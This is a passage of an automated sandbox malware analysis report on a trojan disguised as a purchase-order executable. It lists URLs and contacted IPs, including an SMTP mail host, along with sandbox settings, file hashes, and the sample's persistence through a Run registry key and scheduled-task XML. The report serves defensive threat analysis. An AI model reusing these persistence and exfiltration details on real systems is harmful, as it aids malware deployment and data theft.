00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.ipify.org%Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		low
                                      http://2FcFU77ZypH.orgjVULYR.exe, 0000001D.00000002.520269819.000000000316E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000003.480252697.0000000000D94000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.galapagosdesign.com/Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255349808.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255002822.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.254913650.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255131346.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.255062247.0000000005E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comFPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnaiLPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comaLPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/SPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comtPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comcomdPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.ipify.org%appdataPurchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwPurchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn~Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/EPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/jp/Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://en.wPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244802747.0000000005E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.commSPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.carterandcone.comlPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comituLPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://TwQUlE.comjVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comhPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cne-dPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Y0-Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/hPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comalsPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comalicPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                162.222.225.16
                                                		unknownUnited States
                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                208.91.198.38
                                                		us2.smtp.mailhostbox.comUnited States
                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:626538
                                                Start date and time: 14/05/202211:35:302022-05-14 11:35:30 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 22s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Purchase order 450080088 proj. Allt Charnan.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:38
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.spyw.evad.winEXE@23/16@12/3
                                                EGA Information:
                                                • Successful, ratio: 83.3%
                                                HDC Information:
                                                • Successful, ratio: 1.6% (good quality ratio 1.1%)
                                                • Quality average: 55.9%
                                                • Quality standard deviation: 43%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 173
                                                • Number of non-executed functions: 6
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Execution Graph export aborted for target Purchase order 450080088 proj. Allt Charnan.exe, PID 7112 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:36:39API Interceptor652x Sleep call for process: Purchase order 450080088 proj. Allt Charnan.exe modified
                                                11:36:44API Interceptor32x Sleep call for process: powershell.exe modified
                                                11:36:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jVULYR C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                11:37:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jVULYR C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                11:37:09API Interceptor430x Sleep call for process: jVULYR.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase order 450080088 proj. Allt Charnan.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jVULYR.exe.log

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22276
                                                Entropy (8bit):5.602944370591129
                                                Encrypted:false
                                                SSDEEP:384:stCDL+0wgSEn7J+0tv+CS0n0jultI+b7Y9gtSJ3xeT1MaXZlbAV787WdO5ZBDI++:F7J+qT0Clth7tc8C+fwIvVU
                                                MD5:ECC0AC3C384575596E261D66E00E67E0
                                                SHA1:6CA2B70139DD3E5167E7FFCC68BD756855235F91
                                                SHA-256:75B4F86BD8FD5A949C7EA84AA61BA8177C4E71A458F2757E8AD5F58EEB15653B
                                                SHA-512:DE5C577BA626CB916866FDA491F1627F1F79204016579902DF3A4EA7F843ADC5A85A2D4AF33EC4B9C4349A389057CFD555558E719FDB41FD07231E4416CDAA05
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:@...e...........y.......h...o.e.b.....X...J..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdklw3ta.cbr.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tthe0xip.sxn.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\tmp2B32.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Local\Temp\tmp86F3.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
